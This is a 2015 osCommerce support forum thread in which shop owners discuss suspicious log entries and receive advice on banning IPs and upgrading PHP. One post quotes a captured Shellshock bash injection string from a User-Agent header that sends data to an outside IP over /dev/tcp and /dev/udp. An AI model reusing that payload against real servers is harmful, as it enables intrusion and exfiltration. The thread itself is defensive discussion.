drillsar Posted February 26, 2015 Share Posted February 26, 2015 I installed http error log and noticed a couple of people keep going to find this file: /images/thumbnails/160/160/product/1/yhst-129599579720997_2272_101803540.jpg and it doesnt exist? They trying to hack or what? Link to comment Share on other sites More sharing options...
clustersolutions Posted February 26, 2015 Share Posted February 26, 2015 Look at the IP and see where the request is coming from. You could have issues in your codes, or there can be bad links that you cannot control. There aren't much to hack with that link... Link to comment Share on other sites More sharing options...
rory1 Posted February 26, 2015 Share Posted February 26, 2015 I have installed supertracker and i find this... Customer Browser: () { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\" Referred By: /dev/tcp/213.233.161.42/23; echo mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"?" target="_blank">() { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"? where mysitexxxx = my site with 3 different ways maybe try of hacking? Link to comment Share on other sites More sharing options...
greasemonkey Posted February 26, 2015 Share Posted February 26, 2015 It may be just a bot trying to index your images. Link to comment Share on other sites More sharing options...
♥kymation Posted February 27, 2015 Share Posted February 27, 2015 @@rory1 That code is trying to grab a copy of your PHP5 install. The IP address is allocated to "AS12660 Sharif University of Technology, Tehran, Iran". My bet is that it's a hack attempt, or trying to get information for one. Regards Jim See my profile for a list of my addons and ways to get support. Link to comment Share on other sites More sharing options...
drillsar Posted February 27, 2015 Author Share Posted February 27, 2015 I would ban that IP definitely looks suspicious even know it may do no good Link to comment Share on other sites More sharing options...
rory1 Posted February 27, 2015 Share Posted February 27, 2015 @@kymation They succeeded to send spam mail from my site...i made restore from previews days and i ban the ip..now i must find how they doit... Link to comment Share on other sites More sharing options...
♥kymation Posted February 27, 2015 Share Posted February 27, 2015 If they were trying to grab a copy of your PHP install, I would assume that they were looking for (and found) a PHP vulnerability. What version of PHP was that? You can probably stop them by upgrading to a newer version of PHP. You should be using PHP 5.5 or higher. Regards Jim See my profile for a list of my addons and ways to get support. Link to comment Share on other sites More sharing options...
rory1 Posted February 27, 2015 Share Posted February 27, 2015 @@kymation my version is 5.3 i have to contact to my webhost to update it Link to comment Share on other sites More sharing options...
♥kymation Posted February 27, 2015 Share Posted February 27, 2015 PHP 5.3 is no longer supported and should be considered insecure. 5.4 is deprecated and support will end this summer. 5.5 is the minimum fully supported version. Make certain that you are running the latest version of osCommerce, as many older versions do not support PHP 5.5. Regards Jim See my profile for a list of my addons and ways to get support. Link to comment Share on other sites More sharing options...
Blue Penguin Posted March 2, 2015 Share Posted March 2, 2015 @@kymation - good to know about the php 5.5. I have noticed there seems to be an ability to select options json, soap, pdf. Would anyone know of a useful link for what should be turned on? Or even one that talks about security in php 5.5. -BP Link to comment Share on other sites More sharing options...
♥kymation Posted March 2, 2015 Share Posted March 2, 2015 Json is used by some modules (USPS for one) so I would turn that on. Soap is also used to communicate with some external sources. PDF is good if you want to add PDF catalog pages, invoices, etc. PHP 5.5 is still being actively maintained, so I think it is pretty safe. Regards Jim See my profile for a list of my addons and ways to get support. Link to comment Share on other sites More sharing options...
Blue Penguin Posted March 6, 2015 Share Posted March 6, 2015 Thank you kymation, I should have stated: I have noticed there seems to be an ability to select many options such as json, soap, pdf, etc. As I am looking at around 100+ of such things. I have worked with 5.4 before with good results, just haven't had enough time to research 5.5 yet. I wasn't sure if a feature of 5.5 was these "new" options or if there is just a admin interface now for turning on and off items? This ability wasn't present with the older versions on my host so it go me to wondering if 5.5 has a special focus to ensure better security. It also got me curious what would be relevant for security or functionality for osCommerce. I know that php has a config file to turn things on and off but haven't gotten to open that up and analyze it yet. Which may or may not be possible as the Host manages settings to ensure their servers are configured well and in many cases their choices on the configuration are done with purpose. -BP Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.